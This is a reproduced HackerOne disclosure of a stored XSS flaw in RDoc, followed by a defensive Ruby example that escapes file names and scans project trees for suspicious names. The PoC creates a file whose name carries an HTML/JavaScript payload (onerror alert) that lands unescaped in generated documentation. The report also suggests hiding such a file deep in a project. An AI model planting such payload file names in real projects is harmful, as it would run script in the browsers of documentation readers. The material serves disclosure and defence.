HackerOne report by sighook, H1:1321358
Aug 27, 2021 - 12:35 p.m.

Ruby: XSS exploit of RDoc documentation generated by rdoc

2021-08-27 12:35:33 | sighook | hackerone.com

CVSS2: 4.3 Medium (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE

EPSS: 0.004 Low (percentile 69.9%)

When generating RDoc HTML documentation, malicious code can be injected through a file name.

PoC

~ $ touch \"\>\<object\ src\=1\ onerror\=\"javascript\:alert\(1\)\;\"\>Controlling\ what\ is\ documented\ here
~ $ ls
"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here
~ $ rdoc --all

The generated index file now contains the injected JavaScript:

...
<li><a href="./">&lt;object src=1 onerror="javascript:alert(1);"&gt;Controlling what is documented here.html"&gt;&quot;&gt;&lt;object src=1 onerror=&quot;javascript:alert(1);&quot;&gt;Controlling what is documented here</a>
...

I set the vulnerability to the same severity as CVE-2013-0256, since rdoc is widely used on dev/production systems, for online documentation, etc. An attacker can hide a badly named file deep in the project structure to be stealthy. Also, the file can have a tricky name in the documentation list and can contain real documentation code, so as not to arouse suspicion for some time.

Impact

The injected code can exfiltrate data or install malware on the user's or developer's machine, etc.
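As an added example (not part of the original report and not RDoc's own generator code), the Ruby sketch below shows the bug class the report describes and two checks a maintainer can run: an index-entry builder that interpolates a file name unescaped next to one that escapes it with CGI.escapeHTML, and a scan that finds file names containing HTML metacharacters anywhere in a project tree, using the report's PoC file name as constructed input. The template strings, the function names and the directory layout in the demo are assumptions for illustration.

```ruby
#!/usr/bin/env ruby
# Added example: illustrates the bug class from the report above. The HTML
# templates here are hypothetical sketches, not RDoc's real generator code.
require 'cgi'
require 'find'
require 'fileutils'
require 'tmpdir'

# The PoC file name from the report, constructed inline as sample input.
POC_NAME = %q{"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here}.freeze

# Vulnerable pattern: the file name is interpolated into an attribute value and
# into element text without escaping, so a name containing " or < breaks out.
def index_entry_unsafe(name)
  %(<li><a href="#{name}.html">#{name}</a></li>)
end

# Hardened pattern: escape once for HTML. CGI.escapeHTML encodes & < > " and ',
# which covers both the double-quoted attribute and the text node used here.
def index_entry_safe(name)
  esc = CGI.escapeHTML(name)
  %(<li><a href="#{esc}.html">#{esc}</a></li>)
end

# Characters that can terminate an HTML text node or a double-quoted attribute.
HTML_META = /[<>"'&]/.freeze

# Walk a tree and return every regular file whose base name contains one of the
# metacharacters above. This is the pre-generation check for the "file hidden
# deep in the project structure" case the report describes.
def suspicious_file_names(root)
  hits = []
  Find.find(root) do |path|
    hits << path if File.file?(path) && File.basename(path).match?(HTML_META)
  end
  hits.sort
end

# Build a throwaway project tree (constructed data) with one benign file and the
# PoC name buried three directories down, then return the scan result relative
# to the root. Dir.mktmpdir removes the tree again when the block returns.
def demo_scan
  Dir.mktmpdir('rdoc-xss-demo') do |root|
    deep = File.join(root, 'lib', 'vendor', 'internal')
    FileUtils.mkdir_p(deep)
    File.write(File.join(root, 'README.md'), "# harmless\n")
    File.write(File.join(deep, POC_NAME), "# looks like real documentation\n")
    suspicious_file_names(root).map { |p| p.delete_prefix("#{root}/") }
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe: #{index_entry_unsafe(POC_NAME)}"
  puts "safe:   #{index_entry_safe(POC_NAME)}"
  puts "scan:   #{demo_scan.inspect}"
end
```

Running the script prints the unsafe entry with a live `<object ... onerror=...>` tag, the safe entry with every metacharacter encoded, and the scan result listing only the nested PoC file. The scan is deliberately strict: a legitimate file name with an ampersand or quote is flagged too, which is the right trade-off for a pre-generation gate since such names are rare in source trees and cheap to rename.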
